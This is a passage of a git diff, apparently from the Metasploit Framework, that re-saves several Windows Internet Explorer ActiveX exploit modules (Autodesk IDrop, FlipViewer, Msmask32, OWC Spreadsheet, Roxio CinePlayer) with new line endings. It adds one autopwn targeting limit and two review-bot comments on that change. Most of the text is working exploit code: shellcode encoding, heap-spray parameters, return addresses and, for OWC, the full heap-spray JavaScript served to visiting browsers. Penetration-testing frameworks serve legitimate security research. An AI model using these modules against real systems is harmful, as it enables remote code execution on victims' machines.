rand_text_alpha(rand(100) + 1) - j_fillblock = rand_text_alpha(rand(100) + 1) - j_block = rand_text_alpha(rand(100) + 1) - j_memory = rand_text_alpha(rand(100) + 1) - j_counter = rand_text_alpha(rand(30) + 2) - j_ret = rand_text_alpha(rand(100) + 1) - j_eax = rand_text_alpha(rand(100) + 1) - j_bof = rand_text_alpha(rand(100) + 1) - - # Build out the message - content = %Q| - - - - - | - - print_status("Sending exploit to #{cli.peerhost}:#{cli.peerport}...") - - # Transmit the response to the client - send_response_html(cli, content) - - # Handle the 
payload - handler(cli) - end - + [ 'BID', '35028' ], + [ 'URL', 'http://www.milw0rm.com/exploits/8733' ], + ], + 'DefaultOptions' => + { + 'EXITFUNC' => 'process', + }, + 'Payload' => + { + 'Space' => 1024, + 'BadChars' => "\x00\x09\x0a\x0d'\\", + 'StackAdjustment' => -3500, + }, + 'Platform' => 'win', + 'Targets' => + [ + [ 'Windows XP SP0-SP3 / Windows Vista SP0-SP1 / IE 6.0 SP0-2 & IE 7.0', { 'Offset' => 250, 'Ret' => 0x0C0C0C0C } ] + ], + 'DisclosureDate' => 'May 19 2009', + 'DefaultTarget' => 0)) + end + + def autofilter + false + end + + def check_dependencies + use_zlib + end + + def on_request_uri(cli, request) + # Re-generate the payload + return if ((p = regenerate_payload(cli)) == nil) + + # Encode the shellcode + shellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch)) + + # Setup exploit buffers + nops = Rex::Text.to_unescape([target.ret].pack('V')) + ret = Rex::Text.uri_encode([target.ret].pack('L')) + blocksize = 0x40000 + fillto = 500 + offset = target['Offset'] + + # Randomize the javascript variable names + ampx = rand_text_alpha(rand(100) + 1) + j_shellcode = rand_text_alpha(rand(100) + 1) + j_nops = rand_text_alpha(rand(100) + 1) + j_headersize = rand_text_alpha(rand(100) + 1) + j_slackspace = rand_text_alpha(rand(100) + 1) + j_fillblock = rand_text_alpha(rand(100) + 1) + j_block = rand_text_alpha(rand(100) + 1) + j_memory = rand_text_alpha(rand(100) + 1) + j_counter = rand_text_alpha(rand(30) + 2) + j_ret = rand_text_alpha(rand(100) + 1) + j_eax = rand_text_alpha(rand(100) + 1) + j_bof = rand_text_alpha(rand(100) + 1) + + # Build out the message + content = %Q| + + + + + | + + print_status("Sending exploit to #{cli.peerhost}:#{cli.peerport}...") + + # Transmit the response to the client + send_response_html(cli, content) + + # Handle the payload + handler(cli) + end + end 
diff --git a/modules/exploits/windows/browser/autodesk_idrop.rb b/modules/exploits/windows/browser/autodesk_idrop.rb index d97aceb284..18e84e406b 100644 --- a/modules/exploits/windows/browser/autodesk_idrop.rb +++ b/modules/exploits/windows/browser/autodesk_idrop.rb 
@@ -1,132 +1,132 @@ -require 'msf/core' - -class Metasploit3 < Msf::Exploit::Remote +require 'msf/core' + +class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking - - include Msf::Exploit::Remote::HttpServer::HTML - - def initialize(info = {}) - super(update_info(info, - 'Name' => 'Autodesk IDrop ActiveX Control Heap Memory Corruption', - 'Description' => %q{ - This module exploits a heap-based memory corruption vulnerability in - Autodesk IDrop ActiveX control (IDrop.ocx) version 17.1.51.160. - An attacker can execute arbitrary code by triggering a heap use after - free condition using the Src, Background, PackageXml properties. - }, - 'License' => MSF_LICENSE, - 'Author' => [ - 'Elazar Broad ', # Original exploit [see References] - 'Trancer ' # Metasploit implementation - ], - 'Version' => '$Revision$', - 'References' => - [ - [ 'OSVDB', '53265' ], - [ 'BID', '34352' ], - [ 'URL', 'http://www.milw0rm.com/exploits/8560' ], - [ 'URL', 'http://marc.info/?l=full-disclosure&m=123870112214736' ], - ], - 'DefaultOptions' => - { - 'EXITFUNC' => 'process', - }, - 'Payload' => - { - 'Space' => 1024, - 'BadChars' => "\x00\x09\x0a\x0d'\\", - 'StackAdjustment' => -3500, - }, - 'Platform' => 'win', - 'Targets' => - [ - [ 'Windows XP SP0-SP3 / Windows Vista SP0-SP1 / IE 6.0 SP0-2 & IE 7.0', { 'Offset' => 900, 'Ret' => 0x0C0C0C0C } ] - ], - 'DisclosureDate' => 'Apr 2 2009', - 'DefaultTarget' => 0)) - end - - def autofilter - false - end - - def check_dependencies - use_zlib - end - - def on_request_uri(cli, request) - # Re-generate the payload - return if ((p = regenerate_payload(cli)) == nil) - - # Encode the shellcode - shellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch)) - - # Setup exploit buffers - nops = Rex::Text.to_unescape([target.ret].pack('V')) - blocksize = 0x40000 - fillto = 550 - offset = target['Offset'] - - # Randomize the javascript variable names - idrop = rand_text_alpha(rand(100) + 1) - j_function = rand_text_alpha(rand(100) 
+ 1) - j_shellcode = rand_text_alpha(rand(100) + 1) - j_nops = rand_text_alpha(rand(100) + 1) - j_headersize = rand_text_alpha(rand(100) + 1) - j_slackspace = rand_text_alpha(rand(100) + 1) - j_fillblock = rand_text_alpha(rand(100) + 1) - j_block = rand_text_alpha(rand(100) + 1) - j_memory = rand_text_alpha(rand(100) + 1) - j_counter = rand_text_alpha(rand(30) + 2) - j_ret = rand_text_alpha(rand(100) + 1) - j_mem = rand_text_alpha(rand(100) + 1) - - # Build out the message - content = %Q| - - - - - - - - - | - - print_status("Sending exploit to #{cli.peerhost}:#{cli.peerport}...") - - # Transmit the response to the client - send_response_html(cli, content) - - # Handle the payload - handler(cli) - end - -end + + include Msf::Exploit::Remote::HttpServer::HTML + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Autodesk IDrop ActiveX Control Heap Memory Corruption', + 'Description' => %q{ + This module exploits a heap-based memory corruption vulnerability in + Autodesk IDrop ActiveX control (IDrop.ocx) version 17.1.51.160. + An attacker can execute arbitrary code by triggering a heap use after + free condition using the Src, Background, PackageXml properties. 
+ }, + 'License' => MSF_LICENSE, + 'Author' => [ + 'Elazar Broad ', # Original exploit [see References] + 'Trancer ' # Metasploit implementation + ], + 'Version' => '$Revision$', + 'References' => + [ + [ 'OSVDB', '53265' ], + [ 'BID', '34352' ], + [ 'URL', 'http://www.milw0rm.com/exploits/8560' ], + [ 'URL', 'http://marc.info/?l=full-disclosure&m=123870112214736' ], + ], + 'DefaultOptions' => + { + 'EXITFUNC' => 'process', + }, + 'Payload' => + { + 'Space' => 1024, + 'BadChars' => "\x00\x09\x0a\x0d'\\", + 'StackAdjustment' => -3500, + }, + 'Platform' => 'win', + 'Targets' => + [ + [ 'Windows XP SP0-SP3 / Windows Vista SP0-SP1 / IE 6.0 SP0-2 & IE 7.0', { 'Offset' => 900, 'Ret' => 0x0C0C0C0C } ] + ], + 'DisclosureDate' => 'Apr 2 2009', + 'DefaultTarget' => 0)) + end + + def autofilter + false + end + + def check_dependencies + use_zlib + end + + def on_request_uri(cli, request) + # Re-generate the payload + return if ((p = regenerate_payload(cli)) == nil) + + # Encode the shellcode + shellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch)) + + # Setup exploit buffers + nops = Rex::Text.to_unescape([target.ret].pack('V')) + blocksize = 0x40000 + fillto = 550 + offset = target['Offset'] + + # Randomize the javascript variable names + idrop = rand_text_alpha(rand(100) + 1) + j_function = rand_text_alpha(rand(100) + 1) + j_shellcode = rand_text_alpha(rand(100) + 1) + j_nops = rand_text_alpha(rand(100) + 1) + j_headersize = rand_text_alpha(rand(100) + 1) + j_slackspace = rand_text_alpha(rand(100) + 1) + j_fillblock = rand_text_alpha(rand(100) + 1) + j_block = rand_text_alpha(rand(100) + 1) + j_memory = rand_text_alpha(rand(100) + 1) + j_counter = rand_text_alpha(rand(30) + 2) + j_ret = rand_text_alpha(rand(100) + 1) + j_mem = rand_text_alpha(rand(100) + 1) + + # Build out the message + content = %Q| + + + + + + + + + | + + print_status("Sending exploit to #{cli.peerhost}:#{cli.peerport}...") + + # Transmit the response to the client + 
send_response_html(cli, content) + + # Handle the payload + handler(cli) + end + +end diff --git a/modules/exploits/windows/browser/ebook_flipviewer_fviewerloading.rb b/modules/exploits/windows/browser/ebook_flipviewer_fviewerloading.rb index 6c9ad8c6a9..fa186a3999 100644 --- a/modules/exploits/windows/browser/ebook_flipviewer_fviewerloading.rb +++ b/modules/exploits/windows/browser/ebook_flipviewer_fviewerloading.rb 
@@ -1,115 +1,115 @@ -## -# $Id$ -## - -## -# This file is part of the Metasploit Framework and may be subject to -# redistribution and commercial restrictions. Please see the Metasploit -# Framework web site for more information on licensing and terms of use. -# http://metasploit.com/framework/ -## - -require 'msf/core' - -class Metasploit3 < Msf::Exploit::Remote +## +# $Id$ +## + +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# Framework web site for more information on licensing and terms of use. +# http://metasploit.com/framework/ +## + +require 'msf/core' + +class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking - - include Msf::Exploit::Remote::HttpServer::HTML - - def initialize(info = {}) - super(update_info(info, - 'Name' => 'FlipViewer FViewerLoading ActiveX Control Buffer Overflow', - 'Description' => %q{ - This module exploits a stack overflow in E-BOOK Systems FlipViewer 4.0. - The vulnerability is caused due to a boundary error in the - FViewerLoading (FlipViewerX.dll) ActiveX control when handling the - "LoadOpf()" method. - }, - 'License' => BSD_LICENSE, - 'Author' => [ 'LSO ' ], - 'Version' => '$Revision$', - 'References' => - [ - [ 'CVE', '2007-2919' ], + + include Msf::Exploit::Remote::HttpServer::HTML + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'FlipViewer FViewerLoading ActiveX Control Buffer Overflow', + 'Description' => %q{ + This module exploits a stack overflow in E-BOOK Systems FlipViewer 4.0. + The vulnerability is caused due to a boundary error in the + FViewerLoading (FlipViewerX.dll) ActiveX control when handling the + "LoadOpf()" method. 
+ }, + 'License' => BSD_LICENSE, + 'Author' => [ 'LSO ' ], + 'Version' => '$Revision$', + 'References' => + [ + [ 'CVE', '2007-2919' ], [ 'OSVDB', '37042' ], - [ 'BID', '24328' ], - ], - 'DefaultOptions' => - { - 'EXITFUNC' => 'process', - }, - 'Payload' => - { - 'Space' => 1024, - 'BadChars' => "\x00", - }, - 'Platform' => 'win', - 'Targets' => - [ - # Tested ok patrickw 20090303 - [ 'Windows XP SP0-SP3 / Windows Vista / IE 6.0 SP0-SP2 / IE 7', { 'Ret' => 0x0A0A0A0A } ], - ], - 'DisclosureDate' => 'June 6 2007', - 'DefaultTarget' => 0)) - end - - def autofilter - false - end - - def check_dependencies - use_zlib - end - - def on_request_uri(cli, request) - return if ((p = regenerate_payload(cli)) == nil) - - shellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch)) - - nops = Rex::Text.to_unescape(make_nops(4)) - - ret = Rex::Text.uri_encode([target.ret].pack('L')) - - vname = rand_text_alpha(rand(100) + 1) - var_i = rand_text_alpha(rand(30) + 2) - rand1 = rand_text_alpha(rand(100) + 1) - rand2 = rand_text_alpha(rand(100) + 1) - rand3 = rand_text_alpha(rand(100) + 1) - rand4 = rand_text_alpha(rand(100) + 1) - rand5 = rand_text_alpha(rand(100) + 1) - rand6 = rand_text_alpha(rand(100) + 1) - rand7 = rand_text_alpha(rand(100) + 1) - rand8 = rand_text_alpha(rand(100) + 1) - - content = %Q| - - - - - | - - content = Rex::Text.randomize_space(content) - - print_status("Sending #{self.name} to #{cli.peerhost}:#{cli.peerport}...") - - send_response_html(cli, content) - - handler(cli) - end - -end - + [ 'BID', '24328' ], + ], + 'DefaultOptions' => + { + 'EXITFUNC' => 'process', + }, + 'Payload' => + { + 'Space' => 1024, + 'BadChars' => "\x00", + }, + 'Platform' => 'win', + 'Targets' => + [ + # Tested ok patrickw 20090303 + [ 'Windows XP SP0-SP3 / Windows Vista / IE 6.0 SP0-SP2 / IE 7', { 'Ret' => 0x0A0A0A0A } ], + ], + 'DisclosureDate' => 'June 6 2007', + 'DefaultTarget' => 0)) + end + + def autofilter + false + end + + def check_dependencies + 
use_zlib + end + + def on_request_uri(cli, request) + return if ((p = regenerate_payload(cli)) == nil) + + shellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch)) + + nops = Rex::Text.to_unescape(make_nops(4)) + + ret = Rex::Text.uri_encode([target.ret].pack('L')) + + vname = rand_text_alpha(rand(100) + 1) + var_i = rand_text_alpha(rand(30) + 2) + rand1 = rand_text_alpha(rand(100) + 1) + rand2 = rand_text_alpha(rand(100) + 1) + rand3 = rand_text_alpha(rand(100) + 1) + rand4 = rand_text_alpha(rand(100) + 1) + rand5 = rand_text_alpha(rand(100) + 1) + rand6 = rand_text_alpha(rand(100) + 1) + rand7 = rand_text_alpha(rand(100) + 1) + rand8 = rand_text_alpha(rand(100) + 1) + + content = %Q| + + + + + | + + content = Rex::Text.randomize_space(content) + + print_status("Sending #{self.name} to #{cli.peerhost}:#{cli.peerport}...") + + send_response_html(cli, content) + + handler(cli) + end + +end + diff --git a/modules/exploits/windows/browser/ie_createobject.rb b/modules/exploits/windows/browser/ie_createobject.rb index 4c60845426..ce51bc7ee8 100644 --- a/modules/exploits/windows/browser/ie_createobject.rb +++ b/modules/exploits/windows/browser/ie_createobject.rb @@ -22,6 +22,12 @@ class Metasploit3 < Msf::Exploit::Remote include Msf::Exploit::Remote::BrowserAutopwn autopwn_info({ :ua_name => HttpClients::IE, + # In badly misconfigured situations, IE7 and 8 could be vulnerable to + # this, but by default they throw an ugly popup that stops all script + # execution until the user deals with it and aborts everything if they + # click "no". Not worth the risk of being unable to try more recent + # exploits. + :ua_maxver => "6.0", :javascript => true, :os_name => OperatingSystems::WINDOWS, :vuln_test => 'CreateObject', 
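Review bot: The new `:ua_maxver => "6.0"` line changes which browsers BrowserAutopwn will target with this module, yet every other hunk visible in this diff is a line-ending normalization, so the functional change is easy to miss and should be called out in the description (or split into its own commit) so a later bisect does not attribute a targeting change to a whitespace cleanup. The five-line comment explains the IE7/8 prompt risk well, but it does not say how `:ua_maxver` is compared; if the autopwn code compares full version strings such as `6.0.2900`, a bare `"6.0"` might also exclude IE 6 point releases, which is worth confirming and, if it holds, stating in the comment, e.g. `# IE 6.x (including 6.0.x point releases) still matches "6.0"`. The `autopwn_info({` hash this line belongs to continues outside the hunk.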
@@ -41,7 +47,7 @@ class Metasploit3 < Msf::Exploit::Remote '{0006F033-0000-0000-C000-000000000046}', '{0006F03A-0000-0000-C000-000000000046}', ], - :rank => ExcellentRanking # reliable exe writer + #:rank => ExcellentRanking # reliable exe writer }) def initialize(info = {}) diff --git a/modules/exploits/windows/browser/ms_visual_studio_msmask.rb b/modules/exploits/windows/browser/ms_visual_studio_msmask.rb index de8dda1ec5..e34fede00c 100644 --- a/modules/exploits/windows/browser/ms_visual_studio_msmask.rb +++ b/modules/exploits/windows/browser/ms_visual_studio_msmask.rb 
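Review bot: Commenting out `:rank => ExcellentRanking` leaves a dead line whose trailing comment `# reliable exe writer` now reads as if the ranking were still in effect, and nothing in the hunk records why the autopwn rank was dropped. Either delete the line or replace it with a one-line reason, e.g. `# :rank omitted: IE7/8 script-blocking prompt makes this unreliable for autopwn ordering`, if that is the motivation (the `:ua_maxver` hunk earlier in this file suggests it, but the diff does not say so). The `autopwn_info({` hash starts outside this hunk.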
@@ -1,122 +1,122 @@ -### -## This file is part of the Metasploit Framework and may be subject to -## redistribution and commercial restrictions. Please see the Metasploit -## Framework web site for more information on licensing and terms of use. -## http://metasploit.com/framework/ -### - -require 'msf/core' - -class Metasploit3 < Msf::Exploit::Remote +### +## This file is part of the Metasploit Framework and may be subject to +## redistribution and commercial restrictions. Please see the Metasploit +## Framework web site for more information on licensing and terms of use. +## http://metasploit.com/framework/ +### + +require 'msf/core' + +class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking - - include Msf::Exploit::Remote::HttpServer::HTML - - def initialize(info = {}) - super(update_info(info, - 'Name' => 'Microsoft Visual Studio Msmask32.ocx ActiveX Buffer Overflow.', - 'Description' => %q{ - This module exploits a stack overflow in Microsoft's Visual Studio 6.0. - When passing a specially crafted string to the Mask parameter of the - Msmask32.ocx ActiveX Control, an attacker may be able to execute arbitrary - code. - }, - 'License' => MSF_LICENSE, - 'Author' => [ 'koshi', 'MC' ], - 'Version' => '$Revision$', - 'References' => - [ - [ 'CVE', '2008-3704' ], - [ 'BID','30674' ], - ], - 'DefaultOptions' => - { - 'EXITFUNC' => 'process', - }, - 'Payload' => - { - 'Space' => 1024, - 'BadChars' => "\x00", - }, - 'Platform' => 'win', - 'Targets' => - [ - [ 'Windows XP SP0-SP2 IE 6.0 SP0-SP2', { 'Ret' => '' } ] - ], - 'DisclosureDate' => 'Aug 13 2008', - 'DefaultTarget' => 0)) - - register_options( - [ - OptString.new('URIPATH', [ true, "The URI to use.", "/" ]) - ], self.class) - end - - def autofilter - false - end - - def check_dependencies - use_zlib - end - - def on_request_uri(cli, request) - # Re-generate the payload. - return if ((p = regenerate_payload(cli)) == nil) - - # Encode the shellcode. 
- shellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch)) - - # Create some nops. - nops = Rex::Text.to_unescape(make_nops(4)) - - # Randomize the javascript variable names. - vname = rand_text_alpha(rand(100) + 1) - var_i = rand_text_alpha(rand(30) + 2) - rand1 = rand_text_alpha(rand(100) + 1) - rand2 = rand_text_alpha(rand(100) + 1) - rand3 = rand_text_alpha(rand(100) + 1) - rand4 = rand_text_alpha(rand(100) + 1) - rand5 = rand_text_alpha(rand(100) + 1) - rand6 = rand_text_alpha(rand(100) + 1) - rand7 = rand_text_alpha(rand(100) + 1) - rand8 = rand_text_alpha(rand(100) + 1) - rand9 = rand_text_alpha(rand(100) + 1) - rand10 = rand_text_alpha(rand(100) + 1) - rand11 = rand_text_alpha(rand(100) + 1) - - content = %Q| - - - - | - - print_status("Sending #{self.name} to #{cli.peerhost}:#{cli.peerport}...") - - # Transmit the response to the client - send_response_html(cli, content) - - # Handle the payload - handler(cli) - end - -end + + include Msf::Exploit::Remote::HttpServer::HTML + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Microsoft Visual Studio Msmask32.ocx ActiveX Buffer Overflow.', + 'Description' => %q{ + This module exploits a stack overflow in Microsoft's Visual Studio 6.0. + When passing a specially crafted string to the Mask parameter of the + Msmask32.ocx ActiveX Control, an attacker may be able to execute arbitrary + code. 
+ }, + 'License' => MSF_LICENSE, + 'Author' => [ 'koshi', 'MC' ], + 'Version' => '$Revision$', + 'References' => + [ + [ 'CVE', '2008-3704' ], + [ 'BID','30674' ], + ], + 'DefaultOptions' => + { + 'EXITFUNC' => 'process', + }, + 'Payload' => + { + 'Space' => 1024, + 'BadChars' => "\x00", + }, + 'Platform' => 'win', + 'Targets' => + [ + [ 'Windows XP SP0-SP2 IE 6.0 SP0-SP2', { 'Ret' => '' } ] + ], + 'DisclosureDate' => 'Aug 13 2008', + 'DefaultTarget' => 0)) + + register_options( + [ + OptString.new('URIPATH', [ true, "The URI to use.", "/" ]) + ], self.class) + end + + def autofilter + false + end + + def check_dependencies + use_zlib + end + + def on_request_uri(cli, request) + # Re-generate the payload. + return if ((p = regenerate_payload(cli)) == nil) + + # Encode the shellcode. + shellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch)) + + # Create some nops. + nops = Rex::Text.to_unescape(make_nops(4)) + + # Randomize the javascript variable names. + vname = rand_text_alpha(rand(100) + 1) + var_i = rand_text_alpha(rand(30) + 2) + rand1 = rand_text_alpha(rand(100) + 1) + rand2 = rand_text_alpha(rand(100) + 1) + rand3 = rand_text_alpha(rand(100) + 1) + rand4 = rand_text_alpha(rand(100) + 1) + rand5 = rand_text_alpha(rand(100) + 1) + rand6 = rand_text_alpha(rand(100) + 1) + rand7 = rand_text_alpha(rand(100) + 1) + rand8 = rand_text_alpha(rand(100) + 1) + rand9 = rand_text_alpha(rand(100) + 1) + rand10 = rand_text_alpha(rand(100) + 1) + rand11 = rand_text_alpha(rand(100) + 1) + + content = %Q| + + + + | + + print_status("Sending #{self.name} to #{cli.peerhost}:#{cli.peerport}...") + + # Transmit the response to the client + send_response_html(cli, content) + + # Handle the payload + handler(cli) + end + +end diff --git a/modules/exploits/windows/browser/owc_spreadsheet_msdso.rb b/modules/exploits/windows/browser/owc_spreadsheet_msdso.rb index 3dcb580b1f..fc8e5f24d6 100644 --- a/modules/exploits/windows/browser/owc_spreadsheet_msdso.rb 
+++ b/modules/exploits/windows/browser/owc_spreadsheet_msdso.rb 
@@ -1,133 +1,133 @@ -## -# $Id$ -## - -## -# This file is part of the Metasploit Framework and may be subject to -# redistribution and commercial restrictions. Please see the Metasploit -# Framework web site for more information on licensing and terms of use. -# http://metasploit.com/framework/ -## - - -require 'msf/core' - -class Metasploit3 < Msf::Exploit::Remote +## +# $Id$ +## + +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# Framework web site for more information on licensing and terms of use. +# http://metasploit.com/framework/ +## + + +require 'msf/core' + +class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking - - include Msf::Exploit::Remote::HttpServer::HTML - - def initialize(info = {}) - super(update_info(info, - 'Name' => 'Microsoft OWC Spreadsheet msDataSourceObject Memory Corruption', - 'Description' => %q{ - This module exploits a memory corruption vulnerability within the Office Web Component - Spreadsheet ActiveX control. This module was based on an exploit found in - the wild. 
- }, - 'License' => MSF_LICENSE, - 'Author' => ['unknown','hdm'], - 'Version' => '$Revision$', - 'References' => - [ - [ 'CVE', '2009-1136' ], - [ 'OSVDB', '55806'], - [ 'MSB', 'MS09-043' ], - [ 'URL', 'http://xeye.us/blog/2009/07/one-0day/' ], - [ 'URL', 'http://www.microsoft.com/technet/security/advisory/973472.mspx' ], - ], - 'DefaultOptions' => - { - 'EXITFUNC' => 'process', - }, - 'Payload' => - { - 'Space' => 1024, - 'BadChars' => '', - 'StackAdjustment' => -3500, - }, - 'Platform' => 'win', - 'Targets' => - [ - [ 'Windows XP SP0-SP3 / IE 6.0 SP0-2 & IE 7.0', { 'Ret' => 0x0C0C0C0C } ] - ], - 'DisclosureDate' => 'Jul 13 2009', - 'DefaultTarget' => 0)) - - @javascript_encode_key = rand_text_alpha(rand(10) + 10) - end - - def on_request_uri(cli, request) - - # Send a redirect with the javascript encoding key - #if (!request.uri.match(/\?\w+/)) - # send_local_redirect(cli, "?#{@javascript_encode_key}") - # return - #end - - return if ((p = regenerate_payload(cli)) == nil) - - print_status("Sending #{self.name} to #{cli.peerhost}:#{cli.peerport}...") - - - shellcode = Rex::Text.to_unescape(p.encoded) - retaddr = Rex::Text.to_unescape([target.ret].pack('V')) - - js = %Q| - - var xshellcode = unescape("#{shellcode}"); - - var xarray = new Array(); - var xls = 0x81000-(xshellcode.length*2); - var xbigblock = unescape("#{retaddr}"); - - while( xbigblock.length < xls / 2) { xbigblock += xbigblock; } - var xlh = xbigblock.substring(0, xls / 2); - delete xbigblock; - - for(xi=0; xi<0x99*2; xi++) { - xarray[xi] = xlh + xlh + xshellcode; - } - - CollectGarbage(); - - var xobj = new ActiveXObject("OWC10.Spreadsheet"); - - xe = new Array(); - xe.push(1); - xe.push(2); - xe.push(0); - xe.push(window); - - for(xi=0; xi < xe.length; xi++){ - for(xj=0; xj<10; xj++){ - try { xobj.Evaluate(xe[xi]); } catch(e) { } - } - } - - window.status = xe[3] + ''; - - for(xj=0; xj<10; xj++){ - try{ xobj.msDataSourceObject(xe[3]); } catch(e) { } - } - | - - # Obfuscate it up a bit - js = 
obfuscate_js(js, - 'Symbols' => { - 'Variables' => %W{ xshellcode xarray xls xbigblock xlh xi xobj xe xj} - } - ).to_s - - - # Encode the javascript payload with the URI key - # js = encrypt_js(js, @javascript_encode_key) - - # Fire off the page to the client - send_response(cli, "") - - # Handle the payload - handler(cli) - end - -end + + include Msf::Exploit::Remote::HttpServer::HTML + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Microsoft OWC Spreadsheet msDataSourceObject Memory Corruption', + 'Description' => %q{ + This module exploits a memory corruption vulnerability within the Office Web Component + Spreadsheet ActiveX control. This module was based on an exploit found in + the wild. + }, + 'License' => MSF_LICENSE, + 'Author' => ['unknown','hdm'], + 'Version' => '$Revision$', + 'References' => + [ + [ 'CVE', '2009-1136' ], + [ 'OSVDB', '55806'], + [ 'MSB', 'MS09-043' ], + [ 'URL', 'http://xeye.us/blog/2009/07/one-0day/' ], + [ 'URL', 'http://www.microsoft.com/technet/security/advisory/973472.mspx' ], + ], + 'DefaultOptions' => + { + 'EXITFUNC' => 'process', + }, + 'Payload' => + { + 'Space' => 1024, + 'BadChars' => '', + 'StackAdjustment' => -3500, + }, + 'Platform' => 'win', + 'Targets' => + [ + [ 'Windows XP SP0-SP3 / IE 6.0 SP0-2 & IE 7.0', { 'Ret' => 0x0C0C0C0C } ] + ], + 'DisclosureDate' => 'Jul 13 2009', + 'DefaultTarget' => 0)) + + @javascript_encode_key = rand_text_alpha(rand(10) + 10) + end + + def on_request_uri(cli, request) + + # Send a redirect with the javascript encoding key + #if (!request.uri.match(/\?\w+/)) + # send_local_redirect(cli, "?#{@javascript_encode_key}") + # return + #end + + return if ((p = regenerate_payload(cli)) == nil) + + print_status("Sending #{self.name} to #{cli.peerhost}:#{cli.peerport}...") + + + shellcode = Rex::Text.to_unescape(p.encoded) + retaddr = Rex::Text.to_unescape([target.ret].pack('V')) + + js = %Q| + + var xshellcode = unescape("#{shellcode}"); + + var xarray = new Array(); + var xls 
= 0x81000-(xshellcode.length*2); + var xbigblock = unescape("#{retaddr}"); + + while( xbigblock.length < xls / 2) { xbigblock += xbigblock; } + var xlh = xbigblock.substring(0, xls / 2); + delete xbigblock; + + for(xi=0; xi<0x99*2; xi++) { + xarray[xi] = xlh + xlh + xshellcode; + } + + CollectGarbage(); + + var xobj = new ActiveXObject("OWC10.Spreadsheet"); + + xe = new Array(); + xe.push(1); + xe.push(2); + xe.push(0); + xe.push(window); + + for(xi=0; xi < xe.length; xi++){ + for(xj=0; xj<10; xj++){ + try { xobj.Evaluate(xe[xi]); } catch(e) { } + } + } + + window.status = xe[3] + ''; + + for(xj=0; xj<10; xj++){ + try{ xobj.msDataSourceObject(xe[3]); } catch(e) { } + } + | + + # Obfuscate it up a bit + js = obfuscate_js(js, + 'Symbols' => { + 'Variables' => %W{ xshellcode xarray xls xbigblock xlh xi xobj xe xj} + } + ).to_s + + + # Encode the javascript payload with the URI key + # js = encrypt_js(js, @javascript_encode_key) + + # Fire off the page to the client + send_response(cli, "") + + # Handle the payload + handler(cli) + end + +end diff --git a/modules/exploits/windows/browser/roxio_cineplayer.rb b/modules/exploits/windows/browser/roxio_cineplayer.rb index 58fb6b1a45..f2a74546b9 100644 --- a/modules/exploits/windows/browser/roxio_cineplayer.rb +++ b/modules/exploits/windows/browser/roxio_cineplayer.rb 
@@ -1,110 +1,110 @@ -require 'msf/core' - -class Metasploit3 < Msf::Exploit::Remote +require 'msf/core' + +class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking - - include Msf::Exploit::Remote::HttpServer::HTML - - def initialize(info = {}) - super(update_info(info, - 'Name' => 'Roxio CinePlayer ActiveX Control Buffer Overflow', - 'Description' => %q{ - This module exploits a stack-based buffer overflow in SonicPlayer ActiveX - control (SonicMediaPlayer.dll) 3.0.0.1 installed by Roxio CinePlayer 3.2. - By setting an overly long value to 'DiskType', an attacker can overrun - a buffer and execute arbitrary code. - }, - 'License' => MSF_LICENSE, - 'Author' => [ 'Trancer ' ], - 'Version' => '$Revision$', - 'References' => - [ - [ 'CVE', '2007-1559' ], - [ 'OSVDB', '34779' ], - [ 'BID', '23412' ], - ], - 'DefaultOptions' => - { - 'EXITFUNC' => 'process', - }, - 'Payload' => - { - 'Space' => 1024, - 'BadChars' => "\x00\x09\x0a\x0d'\\", - 'StackAdjustment' => -3500, - }, - 'Platform' => 'win', - 'Targets' => - [ - [ 'Windows XP SP0-SP3 / Windows Vista SP0-SP1 / IE 6.0 SP0-2 & IE 7.0', { 'Offset' => 200, 'Ret' => 0x0C0C0C0C } ] - ], - 'DisclosureDate' => 'Apr 11 2007', - 'DefaultTarget' => 0)) - end - - def autofilter - false - end - - def check_dependencies - use_zlib - end - - def on_request_uri(cli, request) - # Re-generate the payload - return if ((p = regenerate_payload(cli)) == nil) - - # Encode the shellcode - shellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch)) - - # Setup exploit buffers - nops = Rex::Text.to_unescape([target.ret].pack('V')) - ret = Rex::Text.uri_encode([target.ret].pack('L')) - blocksize = 0x40000 - fillto = 500 - offset = target['Offset'] - - # Randomize the javascript variable names - sonic = rand_text_alpha(rand(100) + 1) - j_shellcode = rand_text_alpha(rand(100) + 1) - j_nops = rand_text_alpha(rand(100) + 1) - j_headersize = rand_text_alpha(rand(100) + 1) - j_slackspace = rand_text_alpha(rand(100) + 1) - 
j_fillblock = rand_text_alpha(rand(100) + 1) - j_block = rand_text_alpha(rand(100) + 1) - j_memory = rand_text_alpha(rand(100) + 1) - j_counter = rand_text_alpha(rand(30) + 2) - j_ret = rand_text_alpha(rand(100) + 1) - - # Build out the message - content = %Q| - - - - - | - - print_status("Sending exploit to #{cli.peerhost}:#{cli.peerport}...") - - # Transmit the response to the client - send_response_html(cli, content) - - # Handle the payload - handler(cli) - end - -end + + include Msf::Exploit::Remote::HttpServer::HTML + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Roxio CinePlayer ActiveX Control Buffer Overflow', + 'Description' => %q{ + This module exploits a stack-based buffer overflow in SonicPlayer ActiveX + control (SonicMediaPlayer.dll) 3.0.0.1 installed by Roxio CinePlayer 3.2. + By setting an overly long value to 'DiskType', an attacker can overrun + a buffer and execute arbitrary code. + }, + 'License' => MSF_LICENSE, + 'Author' => [ 'Trancer ' ], + 'Version' => '$Revision$', + 'References' => + [ + [ 'CVE', '2007-1559' ], + [ 